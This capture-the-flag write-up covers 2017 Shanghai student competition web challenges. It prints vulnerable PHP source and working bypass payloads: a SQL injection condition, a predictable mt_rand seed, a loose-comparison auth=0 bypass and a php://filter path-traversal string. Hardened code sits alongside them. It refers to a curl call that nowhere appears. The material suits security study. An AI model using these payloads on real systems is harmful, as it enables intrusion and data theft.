2017 Shanghai College Student Cybersecurity Competition: web challenges

I solved a few of them in passing.

Some Words

Injection through the id parameter

payload

if(1<>2,1,0)

Welcome To My Blog

index.php?action=flag

This reads the source directly.
I am not sure what the curl call further down is for.

Step By Step

index.php

<?php
$seed = rand(0,99999);   // seed space is only 100000 values
mt_srand($seed);
session_start();
function auth_code($length = 12, $special = true)
{
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    if ($special) {
        $chars .= '!@#$%^&*()';
    }
    $password = '';
    for ($i = 0; $i < $length; $i++) {
        $password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
    }
    return $password;
}

$key = auth_code(16, false);          // 16 mt_rand() outputs are shown to the visitor
echo "The key is :" . $key . "<br>";
$private = auth_code(10, false);      // the next 10 outputs of the same generator

if(isset($_POST['private'])){
    if($_POST['private'] === $_SESSION["pri"]){
        header("Location:admin.php");
    }else{
        $_SESSION["pri"] = $private;  // stored in the session after a failed attempt
        die("No private!");
    }
}
?>

admin.php

<?php

if($_GET['authAdmin']!="***********"){
    die("No login!");
}
if(!isset($_POST['auth'])){
    die("No Auth");
}else{
    $auth  = $_POST['auth'];
    $auth_code = "**********";
    if(json_decode($auth) == $auth_code){   // loose comparison of the decoded JSON value
        ;
    }else{
        header("Location:index.php");
    }
}
?>

file.php

<?php

if($_POST["auth"]=="***********"){
    // 'jpg' only has to appear somewhere in id
    if(isset($_GET["id"]) &&  (strpos($_GET["id"],'jpg') !== false))
    {
        $id = $_GET["id"];

        // anything between php:// and resource= is accepted; only the resource is kept
        preg_match("/^php:\/\/.*resource=([^|]*)/i", trim($id), $matches);

        if (isset($matches[1]))
            $id = $matches[1];

        if (file_exists("./" . $id) == false)
            die("file not found");
        $img_data = fopen($id,'rb');
        $data  = fread($img_data,filesize($id));
        echo $data;

    }else{
        echo "file not found";
    }
}
?>

php_mt_rand recovers the seed used in index.php: the key printed on the page is built from mt_rand() outputs, and the seed is only drawn from 0 to 99999.

auth=0 bypasses admin.php: json_decode("0") yields the integer 0, and the loose == comparison against the string $auth_code passes.

Reading the regex carefully shows that

php://filtjpger/read=convert.base64-encode/resource=flag.php

gets past the checks on both sides of it: the 'jpg' inside "filtjpger" satisfies the strpos() check in front, and the regex reduces the id to flag.php for the file_exists() check behind it.
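The two weak checks above next to hardened forms, as an added example that is not part of the challenge's own code; $auth_code, the probe string and the image directory are placeholders:

```php
<?php
// Added example, not the challenge's own code: the loose checks from admin.php
// and file.php next to hardened forms. $secret and $dir are placeholders.

// admin.php: json_decode('0') is int 0, and on PHP < 8 `0 == "<any string>"`
// is true, so auth=0 passes the comparison.
function auth_loose(string $auth, string $auth_code): bool {
    return json_decode($auth) == $auth_code;
}

// Hardened: the decoded value must be a string, compared in constant time.
function auth_strict(string $auth, string $auth_code): bool {
    $decoded = json_decode($auth);
    return is_string($decoded) && hash_equals($auth_code, $decoded);
}

// file.php: 'jpg' only has to occur somewhere in id, and the regex hands back
// whatever follows "resource=", which is what file_exists() then sees.
function file_check_weak(string $id): ?string {
    if (strpos($id, 'jpg') === false) return null;
    preg_match("/^php:\/\/.*resource=([^|]*)/i", trim($id), $m);
    return $m[1] ?? $id;
}

// Hardened: only a bare file name ending in .jpg, resolved inside $dir
// (assumed to be an ordinary directory, not the filesystem root).
function file_check_strict(string $id, string $dir): ?string {
    if (!preg_match('/\A[A-Za-z0-9_-]+\.jpg\z/', $id)) return null;
    $base = realpath($dir);
    $path = realpath($dir . DIRECTORY_SEPARATOR . $id);
    if ($base === false || $path === false) return null;
    return strpos($path, $base . DIRECTORY_SEPARATOR) === 0 ? $path : null;
}

$secret = 'PLACEHOLDER_AUTH_CODE';
$probe  = 'php://filtjpger/read=convert.base64-encode/resource=flag.php';
var_dump(auth_loose('0', $secret));        // true on PHP < 8, the admin.php bypass
var_dump(auth_strict('0', $secret));       // rejected: decoded value is not a string
var_dump(file_check_weak($probe));         // the weak check reduces the id to flag.php
var_dump(file_check_strict($probe, '.'));  // rejected: wrapper syntax never matches
```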
